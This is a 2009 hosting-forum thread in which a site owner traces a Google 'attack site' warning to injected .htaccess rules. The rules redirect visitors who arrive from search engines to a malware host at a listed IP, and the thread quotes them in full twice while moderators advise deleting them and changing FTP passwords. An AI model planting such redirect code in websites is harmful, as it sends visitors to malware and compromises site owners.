Listed as an attack site

Discussion in 'Linux VPS/Dedicated - cPanel' started by jamesp57, Feb 12, 2009.

  1. jamesp57

    jamesp57 New Member

    I just found out that google has listed my forum as an attack site. It appears someone from the IP address 89.28.13.202 has cloned the website address or something.

    If you google http://4x4sonthe.net and then click on the link, it will alert you to a virus or malware site.

    Anyone have this happen to their website? Is there an easy way to clear this up?
     
  2. ppc

    ppc Moderator

  3. jamesp57

    jamesp57 New Member

    Google's webmaster help guide isn't the easiest to navigate but I did find this in the .htaccess file

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

    It's the redirect to the malware site.

    I'm not an expert at programming so any help here would be appreciated.
     
  4. Dan

    Dan Moderator

    Hello James,

    So is that one of your IPs? Did you put that redirect in?

    If not then obviously take it out and change your password ASAP as it would appear that your domain's been compromised. If there isn't anything in the .htaccess that you put in there then you can simply delete the file.
     
  5. jamesp57

    jamesp57 New Member

    That isn't one of my IP's . I deleted all of this:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

    but left the rest of the file. I found out from the support guys that someone from a Russian IP address hacked into the site. I changed the password to something a lot more difficult. I'm also changing passwords on all the other sites I manage and placed a ban on 89.* and 94.*.
     
  6. rezag

    rezag New Member

    If it is known and not giving out details of course, I am curious to know what is meant by hacked? what was the entry point?
     
  7. jamesp57

    jamesp57 New Member

    Someone from the IP address of [FONT=Verdana, Arial, Helvetica]94.188.36.46 was able to FTP into my website. In doing so they installed a redirect into several .htaccess files throughout the site. I guess my password wasn't secure enough.

    From what I have seen and read, this is a common problem.

    http://www.google.com/support/forum/p/Webmasters/search?hl=en&q=malware
    [/FONT]
     
  8. DesotoD

    DesotoD New Member

    I am having extreme problems with this very same issue. It appears to be mostly Joomla sites that are being hacked but I have seen it on some other installations. I'd block the ips but they just seem to get a new one.
     
  9. Dan

    Dan Moderator

    Hello, Desoto

    If they are getting into your machine the same way (FTP) then you need to change your passwords else they'll just keep coming back. In the OP's case his .htaccess was being changed and that will not make any difference as to the content on the site.

     

Share This Page